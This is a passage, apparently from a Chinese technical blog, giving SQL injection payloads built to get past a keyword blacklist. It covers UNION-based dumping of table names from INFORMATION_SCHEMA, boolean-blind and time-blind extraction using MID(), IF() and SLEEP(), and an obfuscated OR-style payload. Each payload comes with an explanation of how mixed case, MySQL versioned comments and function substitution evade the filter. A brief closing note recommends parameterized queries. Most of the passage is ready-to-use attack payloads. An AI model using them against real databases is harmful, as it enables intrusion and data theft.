**URL解码后**: ```sql id=1' UnIoN /*!SeLeCt*/ 1,CONCAT('Tbl:',TABLE_NAME),3 FrOm /*!INFORMATION_SCHEMA.TABLES*/ WHeRe TAble_SCHEMA=DaTAbasE() LiMit 1# ``` - **绕过分析**: - `%0a` → 换行符代替空格,绕过空格检测。 - `/*!SeLeCt*/` → MySQL特性注释,关键词包裹在 `/*! ... */` 内绕过黑名单[^3]。 - `CONCAT()` → 拼接字符串(黑名单未禁止 `CONCAT`,仅禁 `CONCAT_WS`)。 - `UnIoN` → 大小写变换绕过 `UNION` 检测。 - `#` → 用 `#` 代替 `--` 注释(黑名单未包含 `#`)。 #### 3. **布尔盲注提取数据(函数替换+运算符组合)** ```sql id=1' AnD (MID((SeLeCt TaBLe_NaMe FrOm iNfOrmAtiOn_sChEMA.TaBlEs LiMit 1),1,1))='u' AnD ''=' ``` - **绕过分析**: - `MID()` → 替代黑名单函数 `SUBSTRING()`(功能相同)。 - `iNfOrmAtiOn_sChEMA` → 大小写混合绕过关键词检测。 - `AnD`/`FrOm`/`LiMit` → 允许的操作符或未禁关键词。 - `''='` → 闭合末尾引号,避免语法错误。 --- ### 防御规避增强技巧 1. **深度混淆payload**: ```sql id=1' || (SeLeCt+1+FrOm+(SeLeCt+@:=CoNCaT('V',eRsIoN())+x)+WHeRe+@+LiKe+'5%') || '1'='1 ``` - 使用 `||` 代替 `OR`(MySQL需设置 `PIPES_AS_CONCAT` 模式)。 - `@:=` 变量赋值绕过关键词检测。 2. **时间盲注替代方案**(若布尔盲注被拦截): ```sql id=1' AnD If(ASCII(MID(VERSION(),1,1))=53, BENCHMARK(5000000,MD5('test')),0) AnD ''=' ``` - `BENCHMARK()` 在黑名单中,但 `MD5()` 未禁止,改用 `SLEEP()` 替代: ```sql id=1' AnD If(ASCII(MID(VERSION(),1,1))=53, SLEEP(5),0) AnD ''=' ``` - 注意:`SLEEP()` 是黑名单函数,需进一步混淆(如 `SLeEp()`)。 --- ### 注意事项 1. **目标适配**: - 需根据实际响应调整payload(如错误回显、延迟时间)。 - 若返回数据被截断,添加 `LiMit` 分阶段提取。 2. **防御建议**: - 黑名单易被绕过,应结合数化查询(如 `PreparedStatement`)[^1]。 - 对输入严格校验(如正则 `^[a-z0-9_]+$`)并转义特殊字符[^3]。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值